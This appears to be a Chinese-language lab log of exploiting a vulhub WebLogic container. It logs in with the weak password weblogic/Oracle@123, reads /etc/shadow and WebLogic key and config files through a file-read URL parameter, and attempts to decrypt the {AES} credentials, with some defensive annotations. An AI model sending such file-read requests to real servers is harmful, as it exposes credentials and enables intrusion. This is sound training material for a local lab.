cd /var/local/software
/var/local/soft/vulhub-master
-
- 解决报错
/var/local/soft/vulhub-master
✔ weblogic 17 layers [⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿] 0B/0B Pulled 294.9s
✔ 6599cadaf950 Pull complete 10.3s
✔ 23eda618d451 Pull complete 2.3s
✔ f0be3084efe9 Pull complete 1.9s
✔ 52de432f084b Pull complete 3.7s
✔ a3ed95caeb02 Pull complete 4.0s
✔ a2318f26c625 Pull complete 11.7s
✔ 1aa642dd8cc1 Pull complete 7.5s
✔ b307208f8bf5 Pull complete 20.3s
✔ 1dfbbdcc497d Pull complete 12.8s
✔ a53e674a7606 Pull complete 35.8s
✔ 5f06bb51fa3c Pull complete 31.3s
✔ ff0ff72567f2 Pull complete 189.5s
✔ 684862046025 Pull complete 34.0s
✔ abbf8d475455 Pull complete 252.3s
✔ 848eb11ef744 Pull complete 37.6s
✔ 2f3438f2b83b Pull complete 42.1s
✔ 8e5871e15571 Pull complete 47.2s
[+] Building 0.0s (0/0) docker:default
[+] Running 1/1
✘ Network weak_password_default Error 0.2s
failed to create network weak_password_default: Error response from daemon: Failed to program FILTER chain: iptables failed: iptables --wait -I FORWARD -o br-dee114e10024 -j DOCKER: iptables v1.4.21: Couldn't load target `DOCKER':No such file or directory
Try `iptables -h' or 'iptables --help' for more information.
(exit status 2)
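- pkill docker
- iptables -t nat -F
- ifconfig docker0 down
- brctl delbr docker0
- docker -d
- systemctl restart docker
注:报错的直接原因是 iptables 中的 DOCKER 链不存在(常见于 Docker 启动之后防火墙规则被清空或 firewalld 被重启)。多数情况下只执行 systemctl restart docker,让 Docker 重建该链即可。iptables -t nat -F 会清空主机上全部 NAT 规则,不只是 Docker 的;docker -d 是旧版本启动守护进程的写法,新版本改为由 systemd 管理的 dockerd。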
systemctl restart docker
192.168.23.154:7001
http://192.168.23.154:7001/console
username weblogic
password Oracle@123
http://192.168.23.154:7001/hello/file.jsp?path=/etc/passwd
http://192.168.23.154:7001/hello/file.jsp?path=/etc/shadow
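密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径:security/SerializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml ,相对路径:config/config.xml
(注:上面两个标签写反了。SerializedSystemIni.dat 保存的是域的加密密钥材料,config.xml 中以 {AES} 开头的 *-encrypted 字段才是密文。两个文件同时可读时口令即可被还原,所以它们都应限制为仅 WebLogic 运行账户可读;任一文件泄露都应按凭据泄露处理并轮换口令。)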
密文
0d0a 0d0a 04d9 d0e2 e802 2087 50b0 fa9b
9552 23f4 82ec fe8d 5697 e422 4f1d 9ca1
0081 53fc 1da3 895a 4250 6818 3186 b88a
af82 723d 28a8 220f 9f28 7338 d8c5 f9af
3651 c7e7
密钥
http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
<?xml version='1.0' encoding='UTF-8'?>
<!--
  WebLogic domain configuration (config/config.xml) for base_domain,
  domain version 10.3.6.0, as returned by the /hello/file.jsp file-read
  request shown just above this listing.
-->
<domain xmlns="http://xmlns.oracle.com/weblogic/domain"
        xmlns:sec="http://xmlns.oracle.com/weblogic/security"
        xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
  <name>base_domain</name>
  <domain-version>10.3.6.0</domain-version>
  <security-configuration>
    <name>base_domain</name>
    <!-- Security realm "myrealm": every provider below is a stock WebLogic default type. -->
    <realm>
      <sec:authentication-provider xsi:type="wls:default-authenticatorType"/>
      <sec:authentication-provider xsi:type="wls:default-identity-asserterType">
        <sec:active-type>AuthenticatedUser</sec:active-type>
      </sec:authentication-provider>
      <sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"/>
      <sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"/>
      <sec:adjudicator xsi:type="wls:default-adjudicatorType"/>
      <sec:credential-mapper xsi:type="wls:default-credential-mapperType"/>
      <sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"/>
      <sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
      <sec:name>myrealm</sec:name>
      <!--
        Password policy: at least 8 characters, at least 1 numeric or special
        character. The console password recorded on this page (Oracle@123)
        satisfies it, so a length and character-class rule alone does not keep
        out predictable passwords.
      -->
      <sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
        <sec:name>SystemPasswordValidator</sec:name>
        <pas:min-password-length>8</pas:min-password-length>
        <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
      </sec:password-validator>
    </realm>
    <default-realm>myrealm</default-realm>
    <!--
      Values prefixed with {AES} are reversibly encrypted using the domain key
      material kept in security/SerializedSystemIni.dat. Whoever can read both
      files can recover the plaintext, so both need owner-only file permissions
      and exposure of either one warrants rotating these credentials.
    -->
    <credential-encrypted>{AES}VDHLmpIFsxhe5+CetHjC3Du768mgXgEeInws2SytpnqhqgWkdGFks2BYtSJzE3FrrjdLjKS9w24Krv0Ong11Bogvc8rPC6HC3eqZy8X5U8/jhzgwct+ZTRgagnYCb4zy</credential-encrypted>
    <node-manager-username>weblogic</node-manager-username>
    <node-manager-password-encrypted>{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=</node-manager-password-encrypted>
  </security-configuration>
  <server>
    <name>AdminServer</name>
    <!-- Left empty; WebLogic is understood to listen on all available addresses in that case (confirm for this version). -->
    <listen-address/>
  </server>
  <embedded-ldap>
    <name>base_domain</name>
    <!-- Embedded LDAP credential, protected by the same {AES} scheme as the values above. -->
    <credential-encrypted>{AES}uikbk+R+r6Vqv3OiFGQ4XnxJAHEnqFuni3K+SlgZxAsWEyIvLEi+O2omKTsWD9GW</credential-encrypted>
  </embedded-ldap>
  <configuration-version>10.3.6.0</configuration-version>
  <!--
    hello.war is loaded from the autodeploy directory and targeted at
    AdminServer, the same server named as admin-server-name below; it is the
    application behind the /hello/ URLs on this page. DDOnly means roles and
    policies come only from the application's own deployment descriptors.
  -->
  <app-deployment>
    <name>_appsdir_hello_war</name>
    <target>AdminServer</target>
    <module-type>war</module-type>
    <source-path>autodeploy/hello.war</source-path>
    <security-dd-model>DDOnly</security-dd-model>
    <staging-mode>stage</staging-mode>
  </app-deployment>
  <admin-server-name>AdminServer</admin-server-name>
</domain>
λ java -jar D:\800016PenetrationTesting\023中间件漏洞\Weblogic漏洞资料\weblogic_decrypt.jar
Exception in thread "AWT-EventQueue-0" java.lang.NoClassDefFoundError: org/bouncycastle/jce/provider/BouncyCastleProvider
at DecryptorView.makeButtonActionPerformed(DecryptorView.java:244)
at DecryptorView.access$200(DecryptorView.java:17)
at DecryptorView$3.actionPerformed(DecryptorView.java:100)
at java.desktop/javax.swing.AbstractButton.fireActionPerformed(AbstractButton.java:1972)
at java.desktop/javax.swing.AbstractButton$Handler.actionPerformed(AbstractButton.java:2313)
at java.desktop/javax.swing.DefaultButtonModel.fireActionPerformed(DefaultButtonModel.java:405)
at java.desktop/javax.swing.DefaultButtonModel.setPressed(DefaultButtonModel.java:262)
at java.desktop/javax.swing.plaf.basic.BasicButtonListener.mouseReleased(BasicButtonListener.java:279)
at java.desktop/java.awt.Component.processMouseEvent(Component.java:6626)
at java.desktop/javax.swing.JComponent.processMouseEvent(JComponent.java:3389)
at java.desktop/java.awt.Component.processEvent(Component.java:6391)
at java.desktop/java.awt.Container.processEvent(Container.java:2266)
at java.desktop/java.awt.Component.dispatchEventImpl(Component.java:5001)
at java.desktop/java.awt.Container.dispatchEventImpl(Container.java:2324)
at java.desktop/java.awt.Component.dispatchEvent(Component.java:4833)
at java.desktop/java.awt.LightweightDispatcher.retargetMouseEvent(Container.java:4948)
at java.desktop/java.awt.LightweightDispatcher.processMouseEvent(Container.java:4575)
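1.下载bcprov-jdkxx-xxx.jar(从 Bouncy Castle 官方站点或 Maven Central 获取,并核对校验值)
2.将bcprov-jdkxx-xxx.jar放入$JAVA_HOME/jre/lib/ext下
3.打开$JAVA_HOME/jre/lib/security下的java.security文件,在末尾加上
security.provider.x=org.bouncycastle.jce.provider.BouncyCastleProvider
(x 取该文件中已有 security.provider 序号的下一个数字;这项修改对本机该 JRE 下的所有 Java 程序生效。)
注:lib/ext 扩展机制只存在于 Java 8 及更早版本。上面堆栈中的 java.desktop/ 模块前缀说明当前运行的是 Java 9 或更高版本,该目录已被移除,java.security 也改到了 $JAVA_HOME/conf/security 下。这种情况下可改用 JDK 8 运行该工具,或用 -cp 把 bcprov 的 jar 加入类路径并指定主类启动(使用 -jar 时 -cp 会被忽略)。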